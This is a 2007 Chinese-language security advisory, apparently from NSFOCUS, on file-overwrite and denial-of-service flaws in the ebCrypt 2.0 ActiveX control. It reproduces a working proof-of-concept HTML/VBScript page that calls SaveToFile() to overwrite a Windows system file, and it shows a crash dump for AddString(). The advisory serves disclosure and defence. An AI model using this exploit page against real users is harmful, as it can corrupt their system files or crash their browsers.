安全研究
安全漏洞
ebCrypt ActiveX控件任意文件覆盖及拒绝服务漏洞
发布日期:2007-09-24
更新日期:2007-09-26
受影响系统:
EB Design Pty Ltd ebCrypt 2.0描述:
BUGTRAQ ID: 25789,25787
ebCrypt是一套ActiveX组件集,为VisualBasic、VBScript、JScript等提供强加密算法。
ebCrypt的ActiveX控件实现上存在多个安全漏洞,远程攻击者可能利用这些漏洞控制用户系统或导致拒绝服务。
ebCrypt.eb_c_PRNGenerator.1 ActiveX控件(ebCrypt.dll)中的SaveToFile()方式保存了参数所指定的文件,这可能导致覆盖并破坏系统上的任意文件;如果向AddString()方式传送了不少于一个字符的话,还可能导致拒绝服务。以下是异常的dump:
Access violation when reading [3A433B2E]
03158CA4 FF51 10 => CALL DWORD PTR DS:[ECX+10] <-- crash
ECX 3A433B2E <-- ".;C:" (is a part of path)
<*来源:shinnai (shinnai@autistici.org)
链接:http://secunia.com/advisories/26959/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------
<b>EB Design Pty Ltd (EBCRYPT.DLL v.2.0) Multiple Remote Vulnerabilites</b>
url: http://www.ebcrypt.com/
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
<b><font color='red'>This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.</font></b>
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
<b>Marked as:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller, data
KillBitSet: False</b>
This control contains two vulnerabilities:
1) It is possible to cause a DoS passing at least one character to
"AddString()" method. This is a dump of exception:
Access violation when reading [3A433B2E]
03158CA4 FF51 10 => CALL DWORD PTR DS:[ECX+10] <-- crash
ECX 3A433B2E <-- ".;C:" (is a part of path)
2) It is possible to overwrite a file passed as argument to "SaveToFile()"
method
-----------------------------------------------------------------------------
<object classid='clsid:3C34EAC7-9904-4415-BBE4-82AA8C0C0BE8' id='test1'></object>
<object classid='clsid:B1E7505E-BBFD-42BF-98C9-602205A1504C' id='test2'></object>
<input language=VBScript onclick=tryAddString() type=button value='Click here to start AddString test '>
<input language=VBScript onclick=trySaveToFile() type=button value='Click here to start SaveToFile test'>
<script language='vbscript'>
Sub tryAddString
test1.AddString "A"
End Sub
Sub trySaveToFile
test2.SaveToFile "C:\WINDOWS\system_.ini"
MsgBox "Exploit completed."
End Sub
</script>
</span></span>
</code></pre>
建议:
厂商补丁:
EB Design Pty Ltd
-----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.ebcrypt.com/
浏览次数:2656
严重程度:0(网友投票)
绿盟科技给您安全的保障